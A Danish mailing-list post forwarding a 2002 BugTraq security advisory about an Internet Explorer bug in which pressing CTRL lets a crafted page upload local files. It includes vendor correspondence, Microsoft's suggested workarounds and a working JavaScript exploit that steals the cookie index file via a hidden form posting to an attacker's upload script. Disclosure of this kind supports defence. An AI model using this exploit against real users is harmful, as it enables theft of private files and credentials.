Hej Alle,
Følgende er taget fra BugTraq, jeg ved ikke om I kender til exploiten,
om ikke andet, så gør i nu =)
-- CnP from BugTraq Begin
- Sandblad advisory #8 -
---..---..---..---..---..---..---..---..---..---..---..---..----
Title: Pressing CTRL in IE is dangerous
Date: [2002-07-23]
Software: Internet Explorer
Impact: Pressing CTRL in IE may result in arbitrary local
file to be uploaded to a remote server (no exact
path needed). If special sensitive information is
uploaded, it may be used to run remote programs.
Vendor:
http://www.microsoft.com/ _ _
Patch: none o' \,=./ `o
Author: Andreas Sandblad, sandblad@acc.umu.se (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
VENDOR STATUS:
==============
02-06-16
Microsoft was contacted about the issue.
02-07-23
Microsoft sent the following statement:
"After investigation, our product team has confirmed that this does
not
meet the bar of a security vulnerability. We will not be releasing a
hotfix or patch for this issue."
They proposed the following possible workarounds:
1. disable or set to prompt - "Submit nonencrypted form data" option
2. disable "allow paste operations via script" (best)
3. disable active scripting
DESCRIPTION:
============
A special crafted webpage can retrieve any local file using simple
javascript. This is possible by performing the following steps:
1. When an user presses the CTRL key an onkeydown event can be set to
fire. In the event function the key pressed is changed to 'V'. The
result
will be a paste operation with less restrictions.
2. The content of the clipboard is altered and focus is changed to a
hidden file upload form. The paste operation will be performed into
the
form, yielding a change of value for the file upload field (not
normally
allowed).
3. The upload form is submited automaticly (legal javascript
operation).
It isn't necessary to know the exact path to local files because it's
possible to refer to a file with "..\filename".
Further on, if the local file
"..\LOCALS~1\TEMPOR~1\CONTENT.IE5\index.dat"
is uploaded, then the random directories needed to get the exact path
to
the temporarily internet folders can be retrieved. Knowing the exact
path
a compiled help file .chm can be dumped and launched with showHelp()
(old
..chm attack). The compiled help file is allowed to have instructions
to
execute arbitrary programs.
EXPLOIT:
========
Instructions:
Put the html code in a remote html document and load it with Internet
Explorer. Activate the exploit by pressing CTRL. You must prepare a
server
side script to take care of the upload process ("upload.php"). If you
choose to use php I recommend
http://www.php.net/manual/en/features.file-upload.php
as a reference on how to setup a server side script taking care of a
file
upload.
Note:
1. Please remove all "!" characters in the exploit code. They have
been
inserted to decrease false virus alarms triggered by this mail.
2. Default settings are assumed.
Exploit:
-------------------------- CUT HERE -------------------------------
<!div id=h style="zoom:0.0001">
<!form name=u enctype="multipart/form-data" method=post
action=upload.php>
<!input type=file name=file></form></div>
<!script>
//uploadFile="..\\LOCALS~1\\TEMPOR~1\\CONTENT.IE5\\index.dat";
uploadFile="..\\Cookies\\index.dat";
function gotKey(){
if (!event.ctrlKey) return;
document.onkeydown = null;
event.keyCode = 86;
window.clipboardData.setData("Text",uploadFile);
(p=document.forms.u.file).focus();
p.onpropertychange = function(){document.forms.u.submit()};
} document.onkeydown = gotKey;
window.onload=function(){document.body.focus()};
<!/script>
-------------------------- CUT HERE -------------------------------
Disclaimer:
===========
Andreas Sandblad is not responsible for the misuse of the
information provided in this advisory. The opinions expressed
are my own and not of any company. In no event shall the author
be liable for any damages whatsoever arising out of or in
connection with the use or spread of this advisory. Any use of
the information is at the user's own risk.
Old advisories:
===============
#7 [2002-05-19] "IE dot bug"
http://online.securityfocus.com/archive/1/273168
#6 [2002-05-15] "Opera javascript protocoll vulnerability"
http://online.securityfocus.com/archive/1/272583
#5 [2002-04-26] "Mp3 file can execute code in Winamp."
http://online.securityfocus.com/archive/1/269724
#4 [2002-04-15] "Using the backbutton in IE is dangerous."
http://online.securityfocus.com/archive/1/267561
CnP from BugTraq End --
--
Jens